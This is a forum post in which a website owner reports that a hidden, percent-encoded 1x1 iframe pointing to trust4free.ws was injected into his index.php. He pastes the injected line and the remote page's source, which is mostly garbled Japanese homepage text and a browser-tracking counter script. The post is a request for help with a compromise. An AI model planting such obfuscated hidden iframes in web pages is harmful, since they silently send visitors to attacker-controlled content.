Site Hack....But Why?

Hi,

A friend of mine, and a moderator on a couple of your other forums (Newt), suggested I post this here.

I recently noticed something odd with a site that I own, although I'll be honest and say that it's one I don't have to do much with. It's hosted with ipowerweb in the USA.

So, I downloaded the index.php page and found out that the following code had been inserted:

Code:

<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder= "0" width= "1" height= "1" scrolling= "no" name=counter></iframe>

The site address translates as a page on trust4free.ws

Does anyone know what that page might do? Or can anyone shed any further light on what might have happened?

The source code of that page, to save you viewing it, is:

Code:

<HTML>

<HEAD>

  <TITLE>
   the YASUDA's web page
  </TITLE>

English page is <A HREF =  "# "> here </A> 



            <!-- ZoneLabs Privacy Insertion -->
            <script language='javascript' src='http://127.0.0.1:2633/js.cgi?pcaw&r=3093'></script>

<BODY BGCOLOR=99CCFF>

<script language=JavaScript>
setInterval( "window.status=blockedReferrer   ",1);
</SCRIPT>

<CENTER><BR>
  <FONT SIZE=6 COLOR=3366FF><B>

_¡ "y'%ˆ_w_’'…'ÿ'©

  </B></FONT></CENTER><BR>
<P>
'¦'ý'+'>! _ "'_A_A_____J'Å’Cold Spring Harbor_ý<Ã…___iCSHL)'‰'ÿ'©Karel
Svoboda_ý<Å_ó'…"]___o%ˆ_w'à_ý<Å'ç'„'÷'„'÷'œ'ú_B<L%ô'Œò_q___J_j_Y__'ˆ
'‡'à'_'—'„'÷'Å“'ú_B2005 "N'Å’7__'c'§_A<A HREF= "http://neuro.duke.edu ">
Duke'¥_w'Å’___o_ð_w%ˆ</A>'…_%_{'à_n'Ÿ'Å“'ú_B
</P>
<p>

Accesses since 7/30/2004


<table border=0 cellpadding=8 cellspacing=5 width=95%>

<tr><td align=left bgcolor=FFFFCC width=60%> <CENTER><A
HREF= "# "> <B>_A_____J'…_%_{'à' 'õ'_'÷ </B> <BR> <small> 
_e_j_:_A_g_%_b_N'–'Œ "ü </small></A>
</CENTER>
</td><td bgcolor=white width=40%><small>
_A_____J'…'¢''„'©'¥_w<__Ã¥'Å’_E'T'ç'Å’_o%Ÿ'à'Å“'†'Ÿ'_' 'Å’'…'ú_B
</small></td></tr>

<tr><td align=left bgcolor=FFFFCC width=60%>
<CENTER><A HREF= "# ">
<B>%p_ª_ë "ò "-\'õ''•'ú</B></A>
</CENTER>
</td><td bgcolor=white width=40%><small>
%p_ª'ò%ó_¨'ˆ_ "'ò_A_ë "ò "-\'Å’'_'÷'‰'__“'ç'„'©'+'†_B
</small></td></tr>

<tr><td align=left bgcolor=FFFFCC width=60%>
<CENTER><A HREF= "# ">
<B>_\_t_g_E_F_A</B></A>
</CENTER>
</td><td bgcolor=white width=40%><small>
Mac_–_W'Å’_c_¬_\_t_g_E_F_A'ˆ'‡'…'ú_B
</small></td></tr>

<!--------------------->

<tr><td align=left bgcolor=FFFFCC width=60%>
<CENTER><A HREF= "http://d.hatena.ne.jp/ryasuda/ ">
<B>''„'ˆ "ê<L</B></A>
</CENTER>
</td><td bgcolor=white width=40%><small>
Ryohei's Neuroscience Notes
</small></td></tr>

<!--------------------->

<tr><td align=left bgcolor=FFFFCC width=60%>
<CENTER><A HREF= "http://d.hatena.ne.jp/ryasuda/ ">
<B>''„'ˆ_A_ "_e_i</B></A>
</CENTER>
</td><td bgcolor=white width=40%><small>
Ryohei'ò''„'÷'©_y_[_W'…'ú_B
</small></td></tr>

<!--------------------->

<tr><td align=left bgcolor=FFFFCC width=60%>
<CENTER><A HREF= "# ">
<B>__-Å¡_^</B></A>
</CENTER>
</td><td bgcolor=white width=40%><small>
__'___'ð'¦'‘'>'Å’'_'Å’___£ "-\'ˆ'‡_B
</small></td></tr>

<!--------------------->

<tr><td align=left bgcolor=FFFFCC width=60%>
<CENTER><A HREF= "# ">
<B>-ò-à</B></A>
</CENTER>
</td><td bgcolor=white width=40%><small>
'â„¢'á'Å’_c_ˆ_%®'Å“'…_B
</small></td></tr>
</TABLE>
</P>

<P>
<A HREF= "# ">
_õ "… _ý<Ã…_e_[_}_F "<L%ô'Å’ò_q___J_j_Y__'à'T'© "</A> _''<'c'ô_B-__n'Å’_l_ì'<
</P>


<BR>
<HR>
<CENTER>

 "-_T_C_g'–'Å’___ "_N'_c-R'‰'ç'„'-'_'_'÷_B_A-_'K-v'ÿ'¨'Å“'ü'á_B<BR>

<A HREF= "# "> back to homepage (Japanese) </A></B><BR>
<A HREF= "# "> back to homepage (Englih) </A></B><BR>

<A HREF= "mailto:yasuda@cshlshiomi7.org ">
E-mail : yasuda@cshlshiomi7.org</A> <BR>

<A HREF= "http://d.hatena.ne.jp/ryasuda/19000101/ "> "ê-{_ª'Å’___[_<''+'õ
'§'à_Q_†'ç'„'-'_'_'÷</A>
<BR>

<HR>
<center>
<P>
<A HREF= "/ ">home</A></P>
</CENTER> 

<!--STATS4ALL_COUNTER_CODE_START-->
<script language= "javascript "><!--
sver = 10;screensize=" ";colors=" ";navlan=" ";plug=" ";
mainref = " ";
ref = escape(blockedReferrer  )+" ";
sUrl = escape(document.URL)+" ";
if((ref==" ") || (ref== "undefined ")){ref= "bookmark ";};
nav=navigator.appName;zi= "cn ";img =  "mg ";
if(nav.substring(0,9)== "Microsoft "){nav= "MSIE ";};
version=Math.round(parseFloat(navigator.appVersion)*100);
if((nav== "MSIE ") && (parseInt(version)==2)){version=301;};java=" ";
if(navigator.appName== "Netscape "){ if(version>400) navlan=navigator.language;
if(version>300)for(var i=0;i<navigator.plugins.length;i++)plug +=navigator.plugins[i].name+ ": "};
//--></script>
<script language= "javascript1.1 "><!--
sver=11;java=(navigator.javaEnabled()==true)? "y ": "n ";
//--></script>
<script language= "javascript1.2 "><!--
sver=12;screensize=screen.width+ "* "+screen.height;
colors=(nav== "MSIE ")?screen.colorDepth:screen.pixelDepth;
if(colors== "undefined "){colors=" ";};
//--></script>
<script language= "javascript1.3 "><!--
sver=13;
//--></script>
<script language= "javascript1.4 "><!--
sver=14;
//--></script>
<script language= "javascript "><!--
arguments= "&nav= "+nav+ "&version= "+version+ "&screensize= "+screensize+ "&colors= "+colors+ "&sver= "+sver;
arguments+= "&java= "+java+ "&ref= "+ref+ "&mainref= "+mainref+ "&navlan= "+navlan+ "&plug= "+escape(plug)+ "&sUrl= "+sUrl;
document.write ( "<A HREF='http://www.stats4all.cc/?login=login' target=_blank><i "+img+" width=1 height=1 BORDER=0 SRC='http://stats4all.cc/ "+zi+ "/?wmid=login" + arguments +  "&sExtra=None'></i "+img+ "></A> ")
//--></script>
<script language= "javascript1.2 "><!--
document.write( "< ");document.write( "!-- ");
//--></script>
<noscript>
<a href='http://stats4all.cc/?login=login' target=_blank>
<img src='http://127.0.0.1:2633/bug.cgi'>                                                                          </a>
</noscript>
<script language= "javascript1.2 "><!--
document.write( "-- ");document.write( "> ");
//--></script>
<!--STATS4ALL_COUNTER_CODE_END-->

</BODY>

</HTML>

<!-- ZoneLabs Popup Blocking Insertion -->
<script language='javascript'>postamble();</script>

The ZoneLabs stuff will have been inserted by my copy of ZoneAlarm.

Thanks in advance for any help.

Elton